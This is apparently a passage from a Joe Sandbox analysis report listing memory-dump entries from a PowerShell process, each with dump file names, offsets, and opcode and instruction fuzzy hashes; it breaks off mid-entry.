                                                                                                                                                                        • Instruction Fuzzy Hash: BB3124B8E002099FDB04EF64D459BBEB7F3EF84700F1184A9D515AB394DA39AD418F91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6aaef79259a4c05e0ea8970132b7f1a8d427fe9ba91ddb3ca0d6242cd9739fe6
                                                                                                                                                                        • Instruction ID: 163ec372b29e39d21f3f698c507eea9a428bf1f9a967abf07d38c0921bc977d4
                                                                                                                                                                        • Opcode Fuzzy Hash: 6aaef79259a4c05e0ea8970132b7f1a8d427fe9ba91ddb3ca0d6242cd9739fe6
                                                                                                                                                                        • Instruction Fuzzy Hash: F5210779504200DFCB05CF14E9C8B26BB65FB98314F24C599DA0A4AE56C336D456CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9324836952976c0ab2064bb72cf79dbf46b044931b328b579b3444a2d746a241
                                                                                                                                                                        • Instruction ID: 0c441a558b7174a676fe9c39cfbd231ee1718e390a19d04c2f8c57bf21bed304
                                                                                                                                                                        • Opcode Fuzzy Hash: 9324836952976c0ab2064bb72cf79dbf46b044931b328b579b3444a2d746a241
                                                                                                                                                                        • Instruction Fuzzy Hash: B421F3B5A04226CFDB29DF59C541B7D77E1BB15311F078066E8048B290C734D962EBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d2feb8d8bd318d1679e4b713cf715456b156ddcbcd34495047fda9709fa136a1
                                                                                                                                                                        • Instruction ID: e5f0f233c0991af318f669439cb9ef09994d91c83f6f7179ccee4c72375b9770
                                                                                                                                                                        • Opcode Fuzzy Hash: d2feb8d8bd318d1679e4b713cf715456b156ddcbcd34495047fda9709fa136a1
                                                                                                                                                                        • Instruction Fuzzy Hash: AF21067D504204DFDB11DF14E9C8B25BBA5EB64314F24C569DA0B8B646C736D406CB62
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6e482e8299fd0e9997b25f420e2f6cfb94016a43198803295cc1386e0bda0c6b
                                                                                                                                                                        • Instruction ID: 613d4215baf3d62fd75fa231f9c3b3036dd8df2c42d5ffd7fdfd4fbb7630f8a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e482e8299fd0e9997b25f420e2f6cfb94016a43198803295cc1386e0bda0c6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 492197B49017448EEB60CF6AC4887AAFBF6EB88324F28C45ED81D97305DB746481CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f7245f65c6dba3eb32d00892fce9b82c53dfd184540fd2e3247c75ea0ebf051d
                                                                                                                                                                        • Instruction ID: 94de08472ab43b32d1bd57a7813fc8cc76824b262eb6ac52e7b4cda34ba4fc70
                                                                                                                                                                        • Opcode Fuzzy Hash: f7245f65c6dba3eb32d00892fce9b82c53dfd184540fd2e3247c75ea0ebf051d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D112B797001188FCB04DBACE944AEEB7F6EBCC656B0440A5E909DB310DB35DC018BA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cd99a3fbba6027b103572da4030cbc123c4038ebb1dc58c35c2b8c8b0a1b91bf
                                                                                                                                                                        • Instruction ID: 82515e67dc4b8eaa1adce729e720c244eb44444004cb7b17c1c9a32e0342833b
                                                                                                                                                                        • Opcode Fuzzy Hash: cd99a3fbba6027b103572da4030cbc123c4038ebb1dc58c35c2b8c8b0a1b91bf
                                                                                                                                                                        • Instruction Fuzzy Hash: 79110276B045549FCB02DAB8E8198FDBBF1DB88231B0484BAE815DB351CB215C46CBF0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2d298b9918fe32bf387dcd9f40480e23892aef65e9d06e7ca9b0019d4b364ae3
                                                                                                                                                                        • Instruction ID: b1d099ae6bba51181850052a38a10b60a68ef7b84ae7f324a0ba0ffeccd01cbc
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d298b9918fe32bf387dcd9f40480e23892aef65e9d06e7ca9b0019d4b364ae3
                                                                                                                                                                        • Instruction Fuzzy Hash: 80219D758053898FDB10CFAAC908BEABFF8EF49224F18849AD448A7641D7399544CFA5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c8f6d65a1c71f71380573bfcba01473239f62d408e26170bc1fa7d953fe4f6af
                                                                                                                                                                        • Instruction ID: 6b9a077a7815ab683a873bdf5dd55633a397e48133e1673c86540cf558f7a352
                                                                                                                                                                        • Opcode Fuzzy Hash: c8f6d65a1c71f71380573bfcba01473239f62d408e26170bc1fa7d953fe4f6af
                                                                                                                                                                        • Instruction Fuzzy Hash: 141104B0A00236CFCF25CF59C540B6FB7E5FF45221F168069D50887291C730D966DBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                                                                                        • Instruction ID: b68bd43674bc5ab64384311fd1f69f352f584f7910944cc32a43f84114df17c8
                                                                                                                                                                        • Opcode Fuzzy Hash: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                                                                                                                                                        • Instruction Fuzzy Hash: C2219D7A504240DFCF06CF14D9C8B26BF72FB98314F24C5A9D94A4AA56C33AD46ACB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 24f3d712d7d947492d0d6f735a845afc7b0ac15b2ec51d2030a12ae71ec9bf08
                                                                                                                                                                        • Instruction ID: 60ced0753ad047ba18db673636ccde5291b676cd241ec699153814df73cc76a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 24f3d712d7d947492d0d6f735a845afc7b0ac15b2ec51d2030a12ae71ec9bf08
                                                                                                                                                                        • Instruction Fuzzy Hash: DF11FCB4A002199FCB04DF98C494AAAFBF5FF49310B1585A9D919AB351C731EC45CFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                                                                                                                                                        • Instruction ID: e58b2932af5beefdffc64aad9c229c88494f44543f0ca8a047b1f806e25d8abd
                                                                                                                                                                        • Opcode Fuzzy Hash: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3811BE79504280CFCB11CF14E5C8B25BF61FB54224F24C6A9D90A8BA56C33AD44ACB52
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 43624172d2b4f3d89afffdf0aaf9ddc2a568561409c5a11517ba5ea69a6a16aa
                                                                                                                                                                        • Instruction ID: 27237748675a19e7c7732f4af112104c6c4db046e55bea6d15910dd9994a151c
                                                                                                                                                                        • Opcode Fuzzy Hash: 43624172d2b4f3d89afffdf0aaf9ddc2a568561409c5a11517ba5ea69a6a16aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B11E6B8A002199FCB04DF98D494AAEFBF5FF88310B158599E919AB351C731ED41CFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e6a30524b919fda7bb8dba827a9cdc98524ad11395e842a0d1405b57720a56cb
                                                                                                                                                                        • Instruction ID: 35d0ebf890b599bd5a3f06e6e3d8efd26976de7fa2ce3defec6758bb39aea941
                                                                                                                                                                        • Opcode Fuzzy Hash: e6a30524b919fda7bb8dba827a9cdc98524ad11395e842a0d1405b57720a56cb
                                                                                                                                                                        • Instruction Fuzzy Hash: E211BCB5900349CFDB10CFAAC508BAABBF8EB48324F2484ADD44CA7640D339A540CFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f0a2006ad105bf00059b779a46958f2b3b790e8ebae7cbbb23337263804b0401
                                                                                                                                                                        • Instruction ID: fa545a04ca79d100183177d3e1e8c0a8c4870f63150f99dbfc16d13baf93349c
                                                                                                                                                                        • Opcode Fuzzy Hash: f0a2006ad105bf00059b779a46958f2b3b790e8ebae7cbbb23337263804b0401
                                                                                                                                                                        • Instruction Fuzzy Hash: E901C0316083449FD714CB79D4A8A6A7FF5EF45210F1488EED04ACB6A2DB34E845CB01
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b222e50f9346f85926cb6f123248e7fa16eec4f0a485c07c3478a71a0065e61d
                                                                                                                                                                        • Instruction ID: 526a221087f0fdee10847ed7e155793e1cdfc5515e42c4dfcb2b3db2ceded9c6
                                                                                                                                                                        • Opcode Fuzzy Hash: b222e50f9346f85926cb6f123248e7fa16eec4f0a485c07c3478a71a0065e61d
                                                                                                                                                                        • Instruction Fuzzy Hash: EA019E35B002149FCB119F74E848AAEBBF6FB88325F104069E91AD3341DB369901CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4b9694e169870fa959589ea40b83a166fde600a27eb56b9ddd24f6f7f339d01d
                                                                                                                                                                        • Instruction ID: ae5c01e2e358d31c773d7c4c1d79f024da446ee274f42dafe07babbc6ec989bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b9694e169870fa959589ea40b83a166fde600a27eb56b9ddd24f6f7f339d01d
                                                                                                                                                                        • Instruction Fuzzy Hash: 13110C34204750CFC724DF75D040956B7F6EF8521572089ADD48A87B90CB32F845CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 531ce6b318c81415f5b3ae8f436dc9eb783b7c86751b129b0c20b4621d897d4e
                                                                                                                                                                        • Instruction ID: 81fa42b54a4ee534a2a6ce1f464794f475f32d54cb8df54bb8e49b9012d95b41
                                                                                                                                                                        • Opcode Fuzzy Hash: 531ce6b318c81415f5b3ae8f436dc9eb783b7c86751b129b0c20b4621d897d4e
                                                                                                                                                                        • Instruction Fuzzy Hash: DE11E634A05248DFDB15CBA8D488AADFBF2AF48304F24C559E404AB365C771AD82CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e929b2dd832b2242ce9e24d71e1576c1a64570ccf5c84741331dd9263ebe6ae7
                                                                                                                                                                        • Instruction ID: 67ec69335cfda9a24c9a68e1cbdc5004e4f1e06e00d505cc52bcb9c2bd1b67c8
                                                                                                                                                                        • Opcode Fuzzy Hash: e929b2dd832b2242ce9e24d71e1576c1a64570ccf5c84741331dd9263ebe6ae7
                                                                                                                                                                        • Instruction Fuzzy Hash: 6101F7792043449AE7208A25CCC8B76BFD8DF51329F18C41AED0C8F242C7789845C6B2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 211a9e6a31cc3c74f699b1ae2117604c831801bcc17434a2fcf4bd65eed5ae52
                                                                                                                                                                        • Instruction ID: 5477bbf0f752eab7164b098338ec27087265675212766ec84e99f4359d940203
                                                                                                                                                                        • Opcode Fuzzy Hash: 211a9e6a31cc3c74f699b1ae2117604c831801bcc17434a2fcf4bd65eed5ae52
                                                                                                                                                                        • Instruction Fuzzy Hash: 5801526510E3C05ED7124B258C98B62BFB4DF53224F1DC1CBD9888F1A3C2695849C772
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 67321d74c865bcb7fdde869fa57f9e69b3082c81049365552e3d35d57987db22
                                                                                                                                                                        • Instruction ID: c4841cc6326b88d3141080837745e2a58e56b616ff010d611fe166eae61113a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 67321d74c865bcb7fdde869fa57f9e69b3082c81049365552e3d35d57987db22
                                                                                                                                                                        • Instruction Fuzzy Hash: 53F022723083A11FD3008AA99C50DBB7FE9EF86221B0444BBF880C7362DA71CD0087A0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1c299c1271a11e16803fa445ebfa0455c0a93b5a259c8b8f5c58f7c097a346cc
                                                                                                                                                                        • Instruction ID: 63394af0450c5882e73749c878807bfd6dc1f508f63bfbf4b7c779206c261802
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c299c1271a11e16803fa445ebfa0455c0a93b5a259c8b8f5c58f7c097a346cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 0AF0E9717457145B8712569EA8188FE7BE9DFC667230004B7E429C7200DB21990587F2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9a1905a2b95d1404af3672ed61ab79b0169f8bdff5e81f72df67dd57cc574a4a
                                                                                                                                                                        • Instruction ID: fa5a95fd8c183670811fd6b2a6231edb51fedc800ecde43da4fbfbc1e6c33f62
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a1905a2b95d1404af3672ed61ab79b0169f8bdff5e81f72df67dd57cc574a4a
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DF027B55446055FD7115F78D0187AFBBA6EFC1728F10416AC80597381DE372905CBD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d137c2db674da10be321555670fd5855135baf992b1fa0b724ca1d8e1291aa78
                                                                                                                                                                        • Instruction ID: 57c68f0110e502bf6bd21460f2716b1a6f0b71eaa8bafcef761f2208d4a2fb0f
                                                                                                                                                                        • Opcode Fuzzy Hash: d137c2db674da10be321555670fd5855135baf992b1fa0b724ca1d8e1291aa78
                                                                                                                                                                        • Instruction Fuzzy Hash: E2F0B4767052545FC71096A9DC88BBFBBEAEF88662B00052DE44AD3390DF349C468BA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 01e88e035dacd08edab6c23a92a5c3ff5f6fb092220413f722ca48f6e532c3d0
                                                                                                                                                                        • Instruction ID: 51b3076008ddd1f3500b48ebcd4fa7bb3419497c89f28860a3362d84f578bdd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 01e88e035dacd08edab6c23a92a5c3ff5f6fb092220413f722ca48f6e532c3d0
                                                                                                                                                                        • Instruction Fuzzy Hash: 3EF0F97A200644AF97248F0ADD85C23FBEDEFD4674719C59AE84A8B712C671EC41CAA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: df9cadc19c9004c219efc99cb4259d7cfd168ebd22609938cfdab9102f27c3cd
                                                                                                                                                                        • Instruction ID: c636a48e3c16739cb258697c2da1530549db3752b2c8055a83a934bea1def902
                                                                                                                                                                        • Opcode Fuzzy Hash: df9cadc19c9004c219efc99cb4259d7cfd168ebd22609938cfdab9102f27c3cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 71F054769463004FD7609BB9D499396BFE5EB01320F00446AD14DC7341DB39698587A1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2f52af360d4f2f485ca5a7bdfb97d51f3727c428b996c26b0e7d63226a82ce5e
                                                                                                                                                                        • Instruction ID: 2aaeadcc04a0254ca1324b2d5baf5e633dae35507bcca4c9dffbe47b4a204d9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f52af360d4f2f485ca5a7bdfb97d51f3727c428b996c26b0e7d63226a82ce5e
                                                                                                                                                                        • Instruction Fuzzy Hash: 39E061F2B433141B9B5025B5451837AF6DFDFD62947440036CE01C7341DD36CC054791
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d3b8e5082495df404ccab5e9f7c4fadd0f0639257dfc4581a438e84c093a0464
                                                                                                                                                                        • Instruction ID: e2c5804898a7443abc469191177142ac97de5148c61f24ba38bcddeedfbe840f
                                                                                                                                                                        • Opcode Fuzzy Hash: d3b8e5082495df404ccab5e9f7c4fadd0f0639257dfc4581a438e84c093a0464
                                                                                                                                                                        • Instruction Fuzzy Hash: 72F05E383042408FC3008B1DE458866BBF9AFCA615329149AE585DB732DA62EC11CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760617639.000000000286D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0286D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_286d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 798c91c7c1d63f58cdd33c572100a525f2b4af4b6f68658b130d33d295f26857
                                                                                                                                                                        • Instruction ID: 8a13f744b40a319f4b8968c5d2e2c3849b131a0f2ae8a01e61fe3fd7b8ce6c46
                                                                                                                                                                        • Opcode Fuzzy Hash: 798c91c7c1d63f58cdd33c572100a525f2b4af4b6f68658b130d33d295f26857
                                                                                                                                                                        • Instruction Fuzzy Hash: C0F0F979100A80AFD725CF06CD85D23BBF9EBC5624B198499B85A8B712C631FC42CB60
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2a17b93da93c93da344645ed74758dbce6a51f87ec5f22418c6564b7bbe7fe9a
                                                                                                                                                                        • Instruction ID: db8347012a405fa40eca1e1136df365d3e60e2aabf42e44a7812c7c325250a56
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a17b93da93c93da344645ed74758dbce6a51f87ec5f22418c6564b7bbe7fe9a
                                                                                                                                                                        • Instruction Fuzzy Hash: 96F0A7757006149FC7109A59D844A7FB7EAEFCC661B00092DE50DD3340DF30AC4287A1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a7033afcfcc4563fb525930ae5d97f3651e9eb7059748241969d685bbd5eaf72
                                                                                                                                                                        • Instruction ID: 7f29d227e2934cba2aa845968146dd4d15f248fc91eca1adffea3211d8ba12d8
